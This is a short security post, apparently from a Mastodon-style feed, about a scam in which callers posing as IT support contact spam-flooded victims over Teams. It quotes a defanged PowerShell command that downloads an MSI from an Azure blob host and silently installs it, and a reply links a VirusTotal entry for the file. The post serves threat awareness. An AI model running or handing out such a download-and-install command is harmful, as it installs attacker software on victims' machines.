2026-09-28 12:50 UTC
A short while later they got contacted through team by someone claiming to be from IT support.
WHile this isn't a new pattern it is very mean and I guess reasonable effective. Imagin, you are drowning in spam, suddenly you get a call, offering to help you solving your problem!
IN the stress and mental overload situation there is a good chance that you gratefully accept the "help" .
Initially the attackers tried to trick the victims to enable remote access.
Later they switched to trying to get the victims to download and install a MSI via a PowerSHell command
iwr -Uri "hxxps[://]linkupd3[.]blob[.]core[.]windows[.]net/upd/hotfix_v2[.]6[.]msi" -OutFile
"$env:USERPROFILE\downloads\update_v2.6[.]msi";msiexec[.]exe /i "$env:USERPROFILE\downloads\update_v2.6[.]msi" /qn
Again, the two commands are looking like a single command. And the download happens from Microsoft infrastructure which make it look legit.
(the file is no longer available)
#SocialEngineering
Replies (1)
-
@realn2s@infosec.exchange 2026-09-28 12:55
VirusTotal knows about the file https://www.virustotal.com/gui/file/a9174413214a6cdb3646d6cf14de3f6b557a5f1e7214a8f27969212907386a31/details Sadly, I could get my hands on the malicious MSI file. So if someone has it I would love to look inside SIde not: Why is the VirusToal first sen in the wild date after the first submission date??? #SOcialEngineering #VirusTotal